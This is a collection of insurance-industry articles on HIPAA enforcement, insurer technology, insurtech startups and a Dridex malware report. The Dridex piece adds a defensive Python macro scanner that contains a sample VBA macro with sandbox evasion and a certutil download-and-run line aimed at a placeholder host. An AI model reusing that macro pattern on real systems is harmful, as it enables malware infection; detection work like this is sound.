
More Pressure to Protect Health Data

The federal government is demanding better security for personal health data, and those operating health plans must react.

Health plans, insurers and other health plan industry service providers need to ensure that their Internet applications properly safeguard protected health information (PHI), based on a recent warning from the Department of Health and Human Services (HHS) Office for Civil Rights (OCR). The warning comes in a resolution agreement with St. Elizabeth’s Medical Center (SEMC) that settles OCR charges that it breached the Health Insurance Portability and Accountability Act (HIPAA) by failing to protect the security of personal health data when using Internet applications. The agreement shows how complaints filed with OCR by workforce members can create additional compliance headaches for covered entities or their business associates. With recent reports on massive health plan and other data breaches fueling widespread regulatory concern, covered entities and their business associates should prepare to defend the adequacy of their own HIPAA and other health data security practices. Accordingly, health plans and their employer or other sponsors, health plan fiduciaries, health plan vendors acting as business associates and others dealing with health plans and their management should contact legal counsel experienced in these matters for advice within the scope of attorney-client privilege about how to respond to the OCR warning and other developments to manage their HIPAA and other privacy and data security legal and operational risks and liabilities.

SEMC Resolution Agreement Overview

The SEMC resolution agreement settles OCR charges that SEMC violated HIPAA. The charges stem from an OCR investigation of a Nov. 16, 2012, complaint by SEMC workforce members and a separate data breach report that SEMC made to OCR of a breach of unsecured electronic PHI (ePHI). The information was stored on a former SEMC workforce member’s personal laptop and USB flash drive, and 595 individuals were affected.
In their complaint, SEMC workers complained that SEMC violated HIPAA by allowing workforce members to use an Internet-based document application to share and store documents containing electronic protected health information (ePHI) of at least 498 individuals without adequately analyzing the risks. OCR says its investigation of the complaint and breach report revealed among other things that:
  • SEMC improperly disclosed the PHI of at least 1,093 individuals;
  • SEMC failed to implement sufficient security measures regarding the transmission of and storage of ePHI to reduce risks and vulnerabilities to a reasonable and appropriate level; and
  • SEMC failed to identify and respond to a known security incident, mitigate the harmful effects of the security incident and document the security incident and its outcome in a timely manner.
To resolve OCR’s charges, SEMC agreed to pay $218,400 to OCR and implement a “robust corrective action plan.” Although the required settlement payment is relatively small, the resolution agreement merits attention because of its focus on security requirements for Internet application and data use and sharing activities engaged in by virtually every covered entity and business associate.

HIPAA-Specific Compliance Lessons

OCR Director Jocelyn Samuels said covered entities and their business associates must “pay particular attention to HIPAA’s requirements when using Internet-based document sharing applications.” She stated that, “to reduce potential risks and vulnerabilities, all workforce members must follow all policies and procedures, and entities must ensure that incidents are reported and mitigated in a timely manner.” The resolution agreement makes clear that OCR expects health plans and other covered entities and their business associates to be able to show both their timely investigation of reported or suspected HIPAA weaknesses or violations and their self-audits and spot tests of HIPAA compliance in their operations. The SEMC corrective action plan also indicates that covered entities and business associates must be able to produce evidence showing a top-to-bottom dedication to HIPAA, to prove that a “culture of compliance” permeates their organizations. Covered entities and business associates should start by considering the advisability for their own organization of taking one or more of the steps outlined in the “robust corrective action plan,” starting with the specific steps that SEMC must take:
  • Conducting self-audits and spot checks of workforce members’ familiarity and compliance with HIPAA policies and procedures on transmitting ePHI using unauthorized networks; storing ePHI on unauthorized information systems, including unsecured networks and devices; removal of ePHI from SEMC; prohibition on sharing accounts and passwords for ePHI access or storage; encryption of portable devices that access or store ePHI; security incident reporting related to ePHI; and
  • Inspecting laptops, smartphones, storage media and other portable devices, workstations and other devices containing ePHI and other data devices and systems and their use; and
  • Conducting other tests and audits of security and compliance with policies, processes and procedures; and
  • Documenting results, findings, and corrective actions including appropriate up-the-ladder reporting and management oversight of these and other HIPAA compliance expectations, training and other efforts.
Broader HIPAA Compliance and Risk Management Lessons

Covered entities and their business associates also should be mindful of more subtle, but equally important, broader HIPAA compliance and risk management lessons. One of the most significant of these lessons is the need for proper workforce training, oversight and management. The resolution agreement sends an undeniable message that OCR expects covered entities, business associates and their leaders to be able to show their effective oversight and management of the operational compliance of their systems and members of their workforce with HIPAA policies. The resolution agreement also provides insights into the internal corporate processes and documentation of compliance efforts that covered entities and business associates may need to show their organization has the required “culture of compliance.” Particularly notable are terms on documentation and up-the-ladder reporting. Like the tips HHS shared in its recently released Practical Guidance for Health Care Governing Boards on Compliance Oversight, these details are invaluable.

Risks and Responsibilities of Employers and Their Leaders

While HIPAA places the primary duty for complying with HIPAA on covered entities and business associates, health plan sponsors and their management still need to make HIPAA compliance a priority for many practical and legal reasons. HIPAA data breach or other compliance reports often trigger significant financial, administrative, workforce satisfaction and other operational costs for employer health plan sponsors. Inevitable employee concern about health plan data breaches undermines employee value and satisfaction. These concerns usually require employers to expend significant management and financial resources to respond. The costs of investigation and redress of a known or suspected HIPAA data or other breach typically far exceed the actual damages to participants resulting from the breach.
While HIPAA technically does not make sponsoring employers directly responsible for these duties or the costs of their performance, as a practical matter sponsoring employers typically can expect to pay costs and other expenses that its health plan incurs to investigate and redress a HIPAA breach. For one thing, except in the all-too-rare circumstances where employers as plan sponsors have specifically negotiated more favorable indemnification and liability provisions in their vendor contracts, employer and other health plan sponsors usually agree in their health plan vendor contracts to pay the expenses and to indemnify health plan insurers, third party administrators and other vendors for costs and liabilities arising from HIPAA breaches or other events arising in the course of the administration of the health plan. Because employers typically are obligated to pay health plan costs in excess of participant contributions, employers also typically would be required to provide the funding their health plan needs to cover these costs even in the absence of such indemnification agreements. Sponsoring employers and their management also should be aware that the employer’s exception from direct liability for HIPAA compliance does not fully insulate the employer or its management from legal risks in the event of a health plan data breach or other HIPAA violation. While HIPAA generally limits direct responsibility for compliance with the HIPAA rules to a health plan or other covered entity and their business associates, HIPAA hybrid entity and other organizational rules and criminal provisions of HIPAA, as well as various other federal laws, arguably could create liability risks for the employer. See, e.g., Cyber Liability, Healthcare: Healthcare Breaches: How to Respond; Restated HIPAA Regulations Require Health Plans to Tighten Privacy Policies and Practices; Cybercrime and Identity Theft: Health Information Security Beyond. 
For example, hybrid entity and other organizational provisions in the HIPAA rules generally require employers and their health plan to ensure that health plan operations are appropriately distinguished from other employer operations for otherwise non-covered human resources, accounting or other employer activities to avoid subjecting their otherwise non-covered employer operations and data to HIPAA Rules. To achieve this required designation and separation, the HIPAA rules typically also require that the health plan include specific HIPAA language and the employer and health plan take appropriate steps to designate and separate health plan records and data, workforces and operations from the non-covered business operations and records of the sponsoring employer. Failure to fulfill these requirements could result in the unintended spread of HIPAA restrictions and liabilities to other aspects of the employer’s human resources or other operations. Sponsoring employers will want to confirm that health plan and other operations and workforces are properly designated, distinguished and separated to reduce this risk. When putting these designations and separations in place, employers also generally will want to make arrangements to ensure that their health plan includes the necessary terms and that the employer implements the policies necessary for the employer to provide the certifications to the health plan that HIPAA will require that the health plan receive before HIPAA will allow health plan PHI to be disclosed to the employer or its representative for the limited underwriting and other specified plan administration purposes permitted by the HIPAA rules. 
Once these arrangements are in place, employers and their management also generally will want to take steps to ensure that their organization and the members of the employer’s workforce honor these arrangements and do not improperly access or use health plan PHI or systems in violation of these conditions or other HIPAA rules. This or other wrongful use or access of health plan PHI or systems could violate criminal provisions of HIPAA or other federal laws making it a crime for any person, including the employer or a member of its workforce, to wrongfully access health plan PHI, electronic records or systems. Because health plan PHI records also typically include personal tax and Social Security information that the Internal Revenue Code, the Social Security Act and other federal laws generally would require the employer to keep confidential and to protect against improper use, employers and their management also generally should be concerned about potential exposures for their organization that could result from improper use or access of this information in violation of these other federal laws. Because HIPAA and some of these other laws under certain conditions make it a felony to violate these rules, employers and their management generally will want to treat compliance with these federal rules as critical elements of the employer’s federal sentencing guideline and other compliance programs. Employers or members of their management also may have an incentive to promote health plan compliance with HIPAA or other health plan privacy or data security requirements. For instance, health plan sponsors and management involved in health plan decisions, administration or oversight could face personal fiduciary liability risks under ERISA for failing to act prudently to ensure health plan compliance with HIPAA and other federal privacy and data security requirements.
ERISA’s broad functional fiduciary definition encompasses both persons and entities appointed as “named” fiduciaries and others who functionally exercise discretion or control over a plan or its administration. This fiduciary status and risk can arise even if the entity or individual is not designated a named fiduciary, expressly disclaims fiduciary responsibility or does not realize it bears fiduciary status or responsibility. Because fiduciaries generally bear personal liability for their own breaches of fiduciary duty as well as potential co-fiduciary liability for fiduciary breaches committed by others that they knew or prudently should have known about, most employers and members of their management will make HIPAA health plan compliance a priority. Furthermore, most employers and their management also will appreciate the desirability of taking reasonable steps, through the adoption and administration of appropriate human resources, internal investigation and reporting, and risk management policies and practices, to manage potential exposures that the employer or members of its management could face if their health plan or the employer violates the anti-retaliation rules of HIPAA or other laws. See Employee & Other Whistleblower Complaints Common Source of HIPAA Privacy & Other Complaints.

Manage HIPAA and Related Risks

At minimum, health plans and their business associates should move quickly to conduct a documented assessment of the adequacy of their health plan Internet applications and other HIPAA compliance in light of the Resolution Agreement and other developments.
Given the scope and diversity of the legal responsibilities, risks and exposures associated with this analysis, most health plan sponsors, fiduciaries, business associates and their management also will want to consider taking other steps to mitigate various other legal and operational risks that lax protection or use of health plan PHI or systems could create for their health plan, its sponsors, fiduciaries, business associates and their management. Health plan fiduciaries, sponsors and business associates and their leaders also generally will want to explore options to use indemnification agreements, liability insurance or other risk management tools as a stopgap against the costs of investigation or defense of a HIPAA security or other data breach.

Cynthia Marcotte Stamer

Cynthia Marcotte Stamer is board-certified in labor and employment law by the Texas Board of Legal Specialization, recognized as a top healthcare, labor and employment and ERISA/employee benefits lawyer for her decades of experience.

Doubts on Testing for Breast Cancer

Early studies on using mammograms to screen for breast cancer were deeply flawed, largely because they can lead to over-diagnosis.

The Guardian carried a story by Sarah Boseley about the controversy in Europe and other countries about the effectiveness and safety of mammograms. It seems some of the early studies on the issue were deeply flawed. The article says, “Internationally renowned cancer experts have cast fresh doubt on the benefits of breast cancer screening programs, warning that they save fewer lives than previously thought.” Professor Julietta Patnick says, “There are potential risks as well as benefits associated with breast screening, including over-diagnosis, and it is important that women are given information that is clear and accessible before they go for a mammogram.” She calls for women to have truly informed consent so they can decide to have a mammogram or not. This is a controversial area. Should employers be involved in promoting this and prostate screenings? I’m not so sure.

Tom Emerick

Tom Emerick is president of Emerick Consulting and cofounder of EdisonHealth and Thera Advisors. Emerick’s years with Wal-Mart Stores, Burger King, British Petroleum and American Fidelity Assurance have provided him with an excellent blend of experience and contacts.

How to Captivate Customers (Part 3)

To captivate customers, it isn't enough to just change the technology that they touch. You have to take a broad look at all systems.

https://soundcloud.com/insurance-thought-leader/capgemini-salesforce-insurance-thought-leadership-3

ITL Editor-in-Chief Paul Carroll recently hosted a webinar on “Captivating Customers With All-Channel Experiences,” featuring experts from Capgemini and Salesforce.com and the former chief customer experience officer at AIG.

In almost all cases, to provide experiences that captivate customers, insurers must modify their legacy technology infrastructure. Some insurers are building an overlay, taking an innovative approach to the technology that customers touch, but that isn’t enough. Insurers need to take a broader look and make sure that new customer technology integrates effectively with back-end systems such as claims, policy administration, billing and enterprise resource planning (ERP). That way, all parts of the enterprise are driving toward providing the desired customer experience.

These changes will make agents more satisfied and efficient. The changes will also help captivate customers, who want to deal with all parts of the insurance process as one seamless operation. That means both upgrading the technology for agents and incorporating them tightly into the insurer’s systems.

Cloud solutions have proven to deliver the capabilities insurers need faster and with less business disruption than traditional, on-premises alternatives. The result is lower total cost of ownership and significantly reduced project risk. Such an approach lets insurers remain firmly focused on the customer: they can concentrate on designing the customer journey and experience rather than be burdened by the design, build, test and deployment of the technology. To get there from here, insurers need to integrate the interactions among employees, customers and agents and among social networks, internal systems and business processes.
The result needs to support any device, use unified business logic and provide access to data. There needs to be a consistent customer experience across all channels (self-service, agents and call centers). Exhibit 3 provides a sample of the necessary components (in this case, on a Salesforce platform):
  • Customer Interaction Hub, which provides ease of use and information accessibility
  • Platform, which provides multi-device capabilities
  • Service Cloud, which helps agents track the history of customers and policies and engage regularly with customers
  • A cloud-based contact center telephony system. The system (in this case, Odigo) must provide services such as intelligent call routing, natural language recognition, mobile channel integration, biometrics or voice-based authentication, multi-site routing and management dashboards. The platform must allow customers to originate a transaction in one channel and take it forward in another, such as self-service.
  • Document signature software, to allow customers to sign quotes and policies online
  • Integration with popular insurance software packages for policy quotes, binding, claims
When developing for a multi-channel experience, it’s crucial to do lots of A/B testing: changing one variable at a time for a sample of customers, seeing how they react and incorporating those changes that produce better results. It’s also important to actually watch customers to see how they navigate a process: where they stop, where they start up again, where they get sidetracked, where they get confused. We’ve watched customers many times, and the results can be surprising enough to at least require considerable tinkering.

For example, with three releases each year, Salesforce has delivered 47 major releases since its inception. Each release is informed by learning from how users behave, adopt and use Salesforce’s features. As a result, more than 1,700 features have been sourced directly from Salesforce’s customer community. In insurance, Salesforce learns from more than 2,500 insurance customers. These continuing improvements happen in an agile fashion and follow an iterative cycle of release, learn and improve.

The race to become a leading insurer that is able to attract, satisfy and retain customers is in full motion. Those insurers that can blend traditional channels and digital channels in a seamless way will lead the race, creating clear competitive advantage with the capabilities in place to capitalize on market disruption over the coming years.

This is the third article in the series; all three are adapted from a white paper.

Bhuvan Thakur

Bhuvan Thakur is a vice president within the Enterprise Cloud Services business for Capgemini in North America, UK and Asia-Pacific. Thakur has more than 18 years of consulting experience, primarily in the customer relationship management (CRM) and customer experience domain.


Jeffery To

Jeff To is the insurance leader for Salesforce. He has led strategic innovation projects in insurance as part of Salesforce's Ignite program. Before that, To was a Lean Six Sigma black belt leading process transformation and software projects for IBM and PwC's financial services vertical.

9-Step Model for Data Analysis

Too often, data analysis is an unplanned art, with too many "rabbit warrens" being explored. A disciplined approach is required.

When training analysts how to deliver more value, two topics have proved the most popular. One is training in Socratic questioning techniques, to get to the real business need. But, as many analysts have “fallen into” this line of work, rather than making a conscious education and career choice, few have been trained in methodologies. With the exponential growth of insight analysts, marketing analysts and data scientists, the emphasis appears to be on just coding skills and software mastery. Where this is the case, too often analysis is an unplanned art, with unreliable timescales and too many “rabbit warrens” being explored. It is perhaps for this reason that the other most popular topic is a high-level structure for analysis. I call this approach the 9-step model for analysis. It comprises the following steps:
  1. Socratic Questioning: getting to the real business need
  2. Planning & Design: defining the approach and gathering resources
  3. Stakeholder Buy-In: getting agreement on what will be delivered
  4. Data: ensuring the needed quality data and learning from it
  5. Analysis: including exploratory data analysis and hypothesis testing
  6. Insight Generation: converging evidence to get to deeper insights
  7. Stakeholder Sign-Off: support for or refining recommendations
  8. Storytelling & Visualization: capturing hearts and minds for action
  9. Influencing for Action: ensuring appropriate action is taken
What’s your experience of improving the capability of your customer insight team? Have you focused on developing the skills outlined above or other areas? Please do share your tips, too.

Paul Laughlin

Paul Laughlin is the founder of Laughlin Consultancy, which helps companies generate sustainable value from their customer insight. This includes growing their bottom line, improving customer retention and demonstrating to regulators that they treat customers fairly.

Financial Malware Uses Macros to Infect

A new breed of financially focused malware is continually mutating to avoid detection and is being aimed at 1.3 billion email addresses.

A new breed of financially focused malware has cropped up, using new tactics to evade detection and infect harder-to-compromise systems. The Dyre botnet has successfully compromised tens of thousands of victims in North America. Another banking trojan, Dridex, has successfully compromised thousands of systems in Europe and is increasingly targeting companies and users in the U.S. by sending Word documents carrying malicious macro scripts capable of installing the malware.

Cloud-based security provider Proofpoint has focused on Dridex since it appeared late last year, tracking efforts by the groups to target companies with Dridex-laden spam. The attackers send out waves of spam every two or three days, using anywhere from two different e-mail templates to more than 1,000, depending on the group behind the attack. The attacks usually last no longer than five hours, and few, if any, antivirus scanners detect the malware in time, says Wayne Huang, vice president of engineering at Proofpoint. “I would say that they are persistent, but they are not APT (an advanced persistent threat) in that they are not focusing on certain organizations,” he says. “They spread malware primarily to monetize.”

The rapidly changing templates and the use of macros within Word documents are just two of the techniques that Dridex uses to be an efficient infector. More recent versions of the banking malware have used images to track the number of downloads, and the developers also have added features to foil detection and analysis by automated systems. A number of anti-malware systems open suspicious files or run potentially questionable code in a virtual environment (a “sandbox”) to check for malicious behavior.
Yet attackers have found ways to detect whether their code is running in such a sandbox. Initial attempts, for example, would just sleep for an hour or a day, because automated systems typically only executed the code for a few minutes. Most current efforts, however, focus on anomalies in the system in which the program is running. The developers behind the Dyre malware, for example, used a simple command to count the number of processor cores. Many virtual environments only expose a single core for efficiency, while multi-core systems are now ubiquitous on real hardware. Dridex, however, took a simpler tack: Because analysis systems tend to open the suspicious file and wait for any anomalous activity, Dridex is programmed to only execute when the malicious Word document is closed.

The evolution of Dridex has made it an effective vehicle for attacks, says Matt Huang, vice president of product management at Proofpoint. “They have been really mutating their techniques, especially to avoid sandbox detection,” he says. “From very early on, they would change e-mail subjects and file titles. Now, we see a greater variety of techniques.” A single attack often will result in hundreds of thousands of e-mails being sent out. The attackers have at least 1.3 billion e-mail addresses from which to choose, Huang says.

The attackers also are beginning to zero in on other financial targets, such as cryptocurrencies. In some cases, Dridex has downloaded a trojan known as Pony that can steal more than 30 different cryptocurrencies, such as Bitcoin, from a dozen different types of digital wallets. “Recently, they have been using Pony to steal wallets, because the use of virtual currency has picked up,” Huang says. “They have been quite successful.”
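The three evasion tricks described above (a macro that fires only on Document_Close, a long Sleep to outlast an analysis timeout, and a processor-core count to spot a single-core VM) all leave traces in the macro source itself, so a defender can triage them statically before any sandbox ever opens the file. The Python below is an added example written for this page; it is not Proofpoint’s tooling and not code recovered from Dridex. Both macros it scans are constructed samples, the placeholder URL points at a reserved .invalid host, the 60-second stall threshold is an assumption, and extracting the VBA text from the .doc/.docm (for instance with oletools’ olevba) is assumed to have happened already.

```python
"""Static triage of Word macro (VBA) source for sandbox-evasion indicators:
run only on document close, stall with long sleeps, count processor cores.

Added example for this page; not Proofpoint's tooling and not Dridex code.
Both sample macros are constructed. Works on already-extracted VBA text.
"""
import re
from typing import Dict, List

# indicator name -> case-insensitive regex over the macro source
RULES: Dict[str, str] = {
    # Runs when the document opens: the moment a sandbox actually watches.
    "auto_open_trigger": r"\b(AutoOpen|Document_Open|Workbook_Open)\b",
    # Runs only when the document closes: invisible to a sandbox that opens
    # the file, waits a few minutes and never closes it.
    "close_trigger": r"\b(AutoClose|Document_Close|Workbook_BeforeClose)\b",
    # Stalling: kernel32 Sleep imported, or Application.Wait used.
    "sleep_delay": r"\bDeclare\b.*\bSleep\b|\bApplication\.Wait\b",
    # Host fingerprinting: core count via WMI or the environment.
    "core_count_check": (r"Win32_Processor|NumberOfCores|NumberOfLogicalProcessors"
                         r"|NUMBER_OF_PROCESSORS"),
    # Fetching and running a payload.
    "download_and_execute": (r"URLDownloadToFile|\bShell\s*\(|WScript\.Shell"
                             r"|XMLHTTP|ADODB\.Stream|certutil|bitsadmin"),
}

# Sleep argument (ms) at or above this is a stall aimed at an analysis
# timeout, not a UI pause. Threshold is an assumption for this example.
LONG_SLEEP_MS = 60_000

# Indicators that only make sense if the author expects to be analysed.
EVASION = {"close_trigger", "long_sleep", "core_count_check"}


def scan_macro(vba_source: str) -> List[str]:
    """Return the sorted indicator names present in the macro text."""
    hits = {name for name, pattern in RULES.items()
            if re.search(pattern, vba_source, re.IGNORECASE)}
    # Any literal Sleep argument at or above the threshold is a long stall.
    for m in re.finditer(r"\bSleep\s*\(?\s*(\d+)", vba_source, re.IGNORECASE):
        if int(m.group(1)) >= LONG_SLEEP_MS:
            hits.add("long_sleep")
            break
    return sorted(hits)


def verdict(indicators: List[str]) -> str:
    """Coarse triage. Evasion plus a payload path is the combination that
    matters; either alone is common enough in legitimate macros to rate
    only 'suspicious'."""
    found = set(indicators)
    has_payload = "download_and_execute" in found
    has_evasion = bool(found & EVASION)
    if has_payload and has_evasion:
        return "malicious"
    if has_payload or has_evasion:
        return "suspicious"
    return "clean"


# Constructed sample of the evasive pattern: nothing runs on open; on close
# the macro requires more than one core, stalls two minutes, then fetches
# and runs a payload. The URL is a placeholder, not a real host.
SAMPLE_EVASIVE_MACRO = r'''
Private Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal ms As Long)

Private Sub Document_Close()
    Dim wmi, cpu, cores
    cores = 0
    Set wmi = GetObject("winmgmts:\\.\root\cimv2")
    For Each cpu In wmi.ExecQuery("SELECT NumberOfCores FROM Win32_Processor")
        cores = cores + cpu.NumberOfCores
    Next
    If cores < 2 Then Exit Sub
    Sleep 120000
    Dim sh
    Set sh = CreateObject("WScript.Shell")
    sh.Run "cmd /c certutil -urlcache -split -f http://example.invalid/p.exe p.exe && p.exe", 0
End Sub
'''

# Constructed benign sample: a formatting helper with none of the above.
SAMPLE_BENIGN_MACRO = r'''
Sub BoldFirstParagraph()
    ActiveDocument.Paragraphs(1).Range.Font.Bold = True
End Sub
'''

if __name__ == "__main__":
    for label, src in (("evasive", SAMPLE_EVASIVE_MACRO), ("benign", SAMPLE_BENIGN_MACRO)):
        found = scan_macro(src)
        print(f"{label}: {verdict(found)} {found}")
```

Two practical notes. A single indicator is weak evidence: plenty of legitimate macros declare Sleep or use WScript.Shell, which is why the verdict only turns malicious when an evasion indicator co-occurs with a way to fetch and run a payload, the combination the article describes. And because a Document_Close handler never fires in a sandbox that only opens the file, a dynamic pipeline that does not also drive the close event reproduces exactly the blind spot Dridex exploited.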

The Achilles Heel of Insurer Technology

The Achilles heel is that systems design theory of the '80s and '90s was component-based. It made sense at the time; it doesn’t any more.

Migrating the technology infrastructure supporting insurance underwriting to “digital” has substantially different meanings depending on who has the floor. For some insurers, it is simply the ability to put a product on the web and offer on-line quotes to prospective policyholders. For others, it is the ability to quote, bind and issue a policy on line. The more sophisticated platforms offer a complete digital marketplace for consumers to shop, obtain pricing, buy, bind, pay for and have policies delivered for a variety of products, offered by multiple carriers, into a secure web-based account, using familiar, digital, “shopping cart” tools and techniques. Still, many carriers need to examine their current systems, which were not built for speed to market or a high degree of automation. The issue for many carriers attempting to go digital is the burden of having web-based sales integrate seamlessly with their legacy systems. I’ve had numerous conversations with executives who bemoan the fact that they can’t offer a product in a different channel because the systems “can’t handle it.” So, carriers are turning away business (and doing their customers a disservice). The Achilles heel for most insurers is that insurance product systems design theory of the '80s and '90s was component-based. It made sense at the time, but it doesn’t any more. The typical carrier legacy system configuration involves a different systems component for practically every function along the product continuum, starting with account acquisition and continuing through agent licensing, underwriting, compliance, rating, quoting, binding, policy issue, premium collection, commission administration and claims payment and ending with financial reporting. Along the way, account data is input into each separate system (sometimes manually, sometimes automatically), resulting in multiple silos of redundant account data. 
How many employees do you have going through a monthly reconciliation process just to determine you are not double counting business? Wouldn’t it be great if those employees were helping to generate revenue, not figure out if the revenue you think you have is actually revenue? Component-based systems are further complicated because they are often programmed in different languages, come from different vendors, require separate support and maintenance personnel and in many cases rely on programmers who become experts in a very narrow section of the code. (“Don’t ask me about the commission system; I do the billing system.”) The complexity gets compounded with acquisitions of companies that have deployed a similar, component-based approach. Carriers that are serious about a digital transformation need to take a holistic view of the product sales, underwriting and policy administration continuum. Instead of looking at a new component for the underwriting function, a new policy administration system, a new document management system, carriers need to view the entirety of the product process, create a single, relational database and work with a “product agnostic” platform. The ability to put all products on a single system with capabilities to automate underwriting, rating, quoting, binding, policy issue, premium and commission administration is the ideal scenario. Providing access for all users to run all applications from a single system eliminates redundant data entry, programming and maintenance requirements of component-based platforms and enables you and your company to concentrate on the strategic initiatives you’re supposed to focus on.

Brian Harrigan

Brian Harrigan, CEO of InsurIQ, a provider of insurance technology solutions, has spent over 40 years in the insurance industry, helping agents and carriers manage the purchasing of insurance and personal protection products.

What Will Be the Uber of Insurance?

Insurance is ripe for disruption, and here are seven candidates that could revolutionize the industry much as Uber is upending travel.

Insurance is ripe for disruption, and, given the conservative nature of the reigning carriers and large brokers, it is a fair guess that a lot of innovation will come from outside the industry. A few weeks ago, this article touched on how innovation is affecting the financial services industry, but the focus was very much on banking and investing. Today, we aim to expand on this author’s work by focusing on new entrants that are working on disrupting the insurance industry. It is far too early to call who the big winner(s) will be, so we are not yet ready to crown an Uber of insurance, but here are a few of the candidates that we think might be in the winner’s circle when the dust settles:

1. Zenefits: Founded in 2013, this cloud-based HR management company shouldn’t be on a list of companies changing the insurance industry, but it is, because of its innovative approach to selling benefits. According to Forbes, Zenefits was one of the hottest startups in 2014 and looks poised for success in 2015. Its focus is on the more than 5 million employers with fewer than 1,000 employees. Zenefits gives the HR software away and makes money on broker commissions for health insurance sold through the software. The benefits industry was blindsided by this model, and Zenefits is facing lawsuits in multiple states, but, assuming it survives them, it will be in position to upend the traditional way benefits are marketed. The software looks great, and the company claims 10,000 companies with 100,000 employees are already using it. Whether or not Zenefits survives the legal and regulatory onslaught, we love its innovative free-software approach. It’s also interesting that the company started in the Y Combinator startup accelerator. We expect more and more insurance and risk management start-ups to come from start-up accelerators in the next few years as the tech crowd wakes up to the opportunities to disrupt our industry.

2. BizInsure: Founded and owned by San Francisco-based broker Woodruff-Sawyer, BizInsure brought in software from Australia to essentially automate the sales and service process for small commercial insurance. The company started with professional liability and has since expanded to also offer business owner policies (BOPs). The whole business model is based on being able to quote online, buy in seconds and have a declarations page in your inbox in minutes, all while retaining the ability to chat with a licensed agent by phone at any time for either sales or service. The company has been growing slowly by choice, only signing up the carriers that have made their systems completely compatible so there are no manual or overnight batch processes. The company has a decent stable of carriers available, including CNA, Hiscox, Liberty International, Philadelphia and USLI. It looks like BizInsure will now push growth harder, and the question is whether it will be able to hit an exponential growth curve allowing it to disrupt how small business insurance gets sold.

3. MetroMile: The first and thus far only company offering by-the-mile auto insurance in the U.S., Metromile takes a similar approach to Zenefits in that the service is free to everybody, and then the company tries to convert you into a paying customer by offering by-the-mile insurance. Thus far, it's only available in a few states: California, Illinois, Washington and Oregon. But the company is starting to advertise heavily that it can save you money if you drive less than 10,000 miles per year. The free service gives you a free Bluetooth device to install in your car and an app that gives you diagnostics of your vehicle’s performance. For those not ready to fully utilize telematics, this innovative company will still allow you to stay informed about your driving behavior with Metromile Tag, which can track mileage for expenses and driving trends and provide parking location and commute optimization. Another reason the company is a potential disruptor to the industry is that, since January 2015, it has partnered with Uber to offer insurance to drivers, essentially guaranteeing that Uber drivers don’t have a gap in coverage when the Uber policy isn’t covering them. If you think about it, consumers are very used to the pay-for-usage model in other areas, like electricity, water and gas, and MetroMile’s marketing makes the connection explicit. Technically, the company is an agency, not a carrier, and the product is underwritten by National General Insurance Group.

4. Evosure: Currently in invitation-only beta, Evosure’s goal is to reduce the 60% of unwanted quote requests that commercial carriers receive. Evosure simplifies the communication of constantly changing underwriter appetites; a web platform allows brokers to describe the type of risk they have and finds a matching underwriter. The management team has some insurance chops (unlike a lot of other insurance start-ups, which are heavy on tech people): Matt Foran, former director of strategy for Zurich Specialty Products; Brian Wood, former SVP for Marsh & McLennan; and Brett McKenzie, former director of marketing at Fireman’s Fund. We also really love their “Commercial Insurance Is Sexy” T-shirts; we completely agree!

5. Friendsurance (Germany): Friendsurance combines social networking with personal lines insurance in a very interesting way, creating a peer-to-peer (P2P) insurance solution. You create a group of friends needing the same type of insurance, pool your money and insure the pool’s risks with a carrier. If money is left over at the end of the policy period because of good claims experience, you get a refund, or your next term’s premium is cheaper. You never have to pay more than your premium, even if losses are bad, because of a stop-loss. Friendsurance works because insuring with friends reduces fraud and results in better risk selection. Small claims are paid from the pool without the expensive process at the carrier, and the pool grows virally without the need to pay a sales force. We really hope that this works and that somebody tries it in the U.S. soon. After all, if you think about it, this would be a natural 21st century extension to the age-old idea of mutual insurance.

6. SocialIntel.com: Getting credit history, driving history and other background information to underwrite personal lines accounts is expensive. What if we could underwrite equally effectively by analyzing a person’s social media posts? It’s kind of a crazy idea, but that’s what SocialIntel.com is selling. If it works, it could be a game changer. The company aims to help carrier underwriters without using expensive data from the usual databases. Our guess is that it wouldn’t work too well for the over-40 crowd, but it probably works great on my generation because we have a tendency of posting everything on social media. The coolest part of it is that the company continually re-evaluates the risk, not just at underwriting, claim and renewal time.

7. Policy Genius: Started by two former McKinsey consultants who were astonished at the backwardness of the insurance industry, Policy Genius is focused on life and disability insurance and is trying to disprove the idea that insurance is “sold and not bought.” The founders believe that if you educate consumers with the right system, they will buy the right product without a hard sell. Aimed squarely at the Millennial buyer, the friendly insurance checkup takes five minutes and walks you through the different risks in your life. Then it shows you what “People Like You” usually need coverage for and explains why. At the end, you get an insurance to-do list, which recommends the insurance you need in simple language. Interestingly, it points out even home and auto insurance, which, currently, the company doesn’t sell. We really like that the company also tells you what kinds of insurance you don’t need, which builds trust. The company recommended that, at 32 years old, I don't need to buy long-term care yet. If they expand to do all insurance products and do it well, they could become the new way to buy personal lines insurance. One minor thing that’s a turnoff: The company doesn’t currently have an app, so you have to do everything at the website.

We are excited to watch these seven companies develop. The insurance industry is ripe for disruption, and innovative ideas that approach opportunities from a different perspective and complement policyholder demographics are bound to put new life in an old business. Comment below: What other companies or products do you have your eye on? This article originally appeared on InsNerds.com.

Tony Canas

Tony Canas is a young insurance nerd, blogger and speaker. Canas has been very involved in the industry's effort to recruit and retain Millennials and has hosted his session, "Recruiting and Retaining Millennials," at both the 2014 CPCU Society Leadership Conference in Phoenix and the 2014 Annual Meeting in Anaheim.

Unclaimed Funds Can Lead to Data Breaches

In listing unclaimed funds, some states provide far too much data to anyone in the business of exploiting consumer information.

When it comes to privacy, not all states are alike. This was confirmed yet again in the 50 State Compendium of Unclaimed Property Practices we compiled. The compendium ranks the amount of personal data that state treasuries expose during the process by which individuals can collect unclaimed funds. The data exposed can provide fraudsters with a crime exacta: claiming money that no one will ever miss and gathering various nuggets of personal data that can help facilitate other types of identity theft. The takeaway: Some states provide way too much data to anyone who is in the business of exploiting consumer information.

For those who take their privacy seriously, the baseline of our compendium—inclusion in a list of people with unclaimed funds or property—may in itself be unacceptable. For others, finding their name on an unclaimed property list isn’t a huge deal. In fact, two people on our team found unclaimed property in the New York database (I was one of them) while putting together the 50-state compendium, and there were no panic attacks.

